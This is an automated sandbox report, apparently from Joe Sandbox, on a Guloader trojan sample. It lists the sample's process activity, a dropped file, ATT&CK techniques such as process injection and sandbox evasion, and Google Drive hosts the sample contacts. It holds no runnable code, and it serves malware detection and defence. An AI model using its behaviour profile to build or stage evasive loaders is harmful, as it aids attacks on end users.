Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\ro7eoySJ9q.exe

Code function: 0_2_00405D68 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00405D68

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	311 Process Injection	1 Masquerading	OS Credential Dumping	111 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Clipboard Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	311 Process Injection	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Obfuscated Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	14 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
ro7eoySJ9q.exe	61%	ReversingLabs	Win32.Trojan.Guloader
ro7eoySJ9q.exe	72%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\ro7eoySJ9q.exe	61%	ReversingLabs	Win32.Trojan.Guloader

Source	Detection	Scanner	Label	Link
http://crl.microsoft%	0%	Avira URL Cloud	safe
http://crl.microU	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
drive.google.com	216.58.206.78	true	false		high
drive.usercontent.google.com	142.250.181.225	true	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://drive.google.com/user	msiexec.exe, 00000008.00000003.3344924275.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3043324471.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3345075982.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3032314396.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3112558031.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3126066692.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3148742082.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3066077566.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321338094.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3334459298.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3299009797.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3287143818.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321242531.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3077629793.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3287266518.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3088968525.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3101436493.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3184302158.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3334266801.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3077666094.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3253010225.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.2821029727.0000000006029000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000002.00000002.2816419859.0000000005116000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/3x	msiexec.exe, 00000008.00000003.3344924275.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3043324471.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3345075982.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3415424564.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3032314396.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3367235785.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3112558031.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3126066692.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3148742082.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3066077566.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321338094.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3356689700.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3334459298.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3299009797.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3287143818.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321242531.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3378740232.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3077629793.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2988348442.0000000009A20000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3287266518.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3088968525.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000002.00000002.2816419859.0000000005116000.00000004.00000800.00020000.00000000.sdmp	false		high
https://translate.google.com/translate_a/element.js	msiexec.exe, 00000008.00000003.3032314396.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3367235785.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3287143818.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3112558031.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3415424564.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3126066692.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3066077566.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3424004008.0000000009A07000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3424004008.00000000099ED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3242165243.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321303005.0000000009A63000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3219456047.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3393116568.0000000009A60000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3196008939.0000000009A69000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3310503672.0000000009A61000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3230292643.0000000009A61000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3230195804.0000000009A61000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3077629793.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3150159318.0000000009A69000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3173324626.0000000009A69000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3310607658.0000000009A61000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000002.00000002.2816419859.0000000005116000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.microsoft	powershell.exe, 00000002.00000002.2822656298.0000000007758000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000002.00000002.2816419859.0000000005116000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.google.com/4v%	msiexec.exe, 00000008.00000003.3344924275.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3345075982.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3367235785.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321338094.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3356689700.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3334459298.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3299009797.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3287143818.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321242531.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3378740232.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3287266518.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3378104355.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3334266801.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3356523597.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3253010225.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3264909388.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3252872564.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3206818397.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3195852061.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3275713926.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000002.00000002.2821029727.0000000006029000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000002.00000002.2821029727.0000000006029000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/	msiexec.exe, 00000008.00000003.3344924275.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3043324471.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3345075982.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3415424564.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3032314396.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3367235785.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3112558031.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3126066692.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3148742082.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3066077566.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321338094.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3356689700.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3334459298.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3299009797.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3287143818.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321242531.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3378740232.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3077629793.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2988348442.0000000009A20000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3287266518.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3088968525.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	ro7eoySJ9q.exe, 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmp, ro7eoySJ9q.exe, 00000000.00000000.2146201166.000000000040A000.00000008.00000001.01000000.00000003.sdmp	false		high
http://crl.microU	powershell.exe, 00000002.00000002.2822656298.00000000077C8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://drive.google.com/dv	msiexec.exe, 00000008.00000003.3148742082.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321338094.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321242531.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000002.00000002.2816419859.0000000005116000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com	msiexec.exe, 00000008.00000003.3195852061.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3275713926.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.microsoft%	powershell.exe, 00000002.00000002.2822656298.00000000077C8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://drive.google.com/lifornia1	msiexec.exe, 00000008.00000003.3148742082.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3184302158.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.com/ny	msiexec.exe, 00000008.00000003.3253010225.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3264909388.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3252872564.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lB	powershell.exe, 00000002.00000002.2816419859.0000000004FC1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.google.com/	msiexec.exe, 00000008.00000003.3275713926.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.com/U	msiexec.exe, 00000008.00000003.3009836882.0000000009A20000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.com/tv	msiexec.exe, 00000008.00000003.3126066692.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2988348442.0000000009A20000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3009836882.0000000009A20000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2998104920.0000000009A20000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000002.00000002.2816419859.0000000005116000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000002.00000002.2821029727.0000000006029000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.2821029727.0000000006029000.00000004.00000800.00020000.00000000.sdmp	false		high
https://apis.google.com	msiexec.exe, 00000008.00000003.3195852061.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3275713926.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.2816419859.0000000004FC1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.google.com/e	msiexec.exe, 00000008.00000003.3112558031.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3126066692.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3148742082.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3066077566.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321338094.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3334459298.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3299009797.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3287143818.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321242531.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3077629793.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3287266518.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3088968525.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3101436493.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3184302158.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3334266801.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3077666094.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3253010225.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3065994854.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3264909388.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3252872564.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3206818397.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
142.250.181.225	drive.usercontent.google.com	United States		15169	GOOGLEUS	false
216.58.206.78	drive.google.com	United States		15169	GOOGLEUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588610
Start date and time:	2025-01-11 03:06:35 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	ro7eoySJ9q.exe renamed because original name is a hash value
Original Sample Name:	ebda1db301f4e3e3500292b8c519298d577cb9908b94f106a3cbe8c83136a423.exe
Detection:	MAL
Classification:	mal96.troj.evad.winEXE@6/15@2/2
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 89% Number of executed functions: 85 Number of non-executed functions: 29
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212
